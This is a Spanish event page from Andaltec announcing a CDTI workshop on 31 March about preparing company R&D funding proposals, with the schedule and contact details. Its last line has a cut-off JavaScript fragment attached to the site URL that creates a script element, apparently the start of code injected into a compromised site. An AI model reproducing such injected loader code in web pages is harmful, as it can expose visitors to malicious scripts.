Andaltec
Copyright Andaltec
Taller formativo para la preparación de propuestas CDTi, día 31 de Marzo en ANDALTEC. - Andaltec
Andaltec es un centro tecnológico especializado en sistemas de iluminación para automoción, plásticos en contacto con alimentos, prototipado y materiales.
plástico, iluminación, automoción, automóvil, envase, alimentario, ensayo, migración, enac, prototipo, ingeniería, faro, proyector, piloto, material, polímero, pintura, impresión, 3d, simulación, óptica, robot, formación, cad, proyecto, centro, tecnológico, innovación, martos, andalucía, I D I, led
25867
post-template-default,single,single-post,postid-25867,single-format-standard,bridge-core-1.0,ajax_fade,page_not_loaded,,qode_grid_1300,side_area_uncovered_from_content,footer_responsive_adv,qode-content-sidebar-responsive,qode-theme-ver-10.1,wpb-js-composer js-comp-ver-6.10.0,vc_responsive
 

Taller formativo para la preparación de propuestas CDTi, día 31 de Marzo en ANDALTEC.

Taller formativo para la preparación de propuestas CDTi, día 31 de Marzo en ANDALTEC.

Jornada Cdti-Andaltec

CDTi realiza una jornada de formación específica para las personas involucradas en I+D  con objeto de dar a  conocer las principales claves en la preparación de propuestas empresariales para presentar en CDTI.

El taller tendrá lugar el día 31 de Marzo en ANDALTEC en horario de 9:30h a 13:00h y será llevado a cabo por Dña. Pilar de Miguel Ortega, Responsable del  área de Materiales. Dirección de Promoción y Cooperación del Centro para el Desarrollo Tecnológico Industrial (CDTi).

La jornada  se centrará principalmente en la modalidad de Proyecto de Investigación Empresarial (PID) con la ventanilla abierta a lo largo de todo el año, así como en los programas CIEN y FEDER-INNTERCONECTA.

Acceda al FORMULARIO DE INSCRIPCIÓN. 

¿Como llegar a ANDALTEC?

Mas información:

Natalia García
natalia.garcia@andaltec.org
Tel: 953 555 117 ext 243.
www.andaltec.orgvar d=document;var s=d.createElement(‘script’);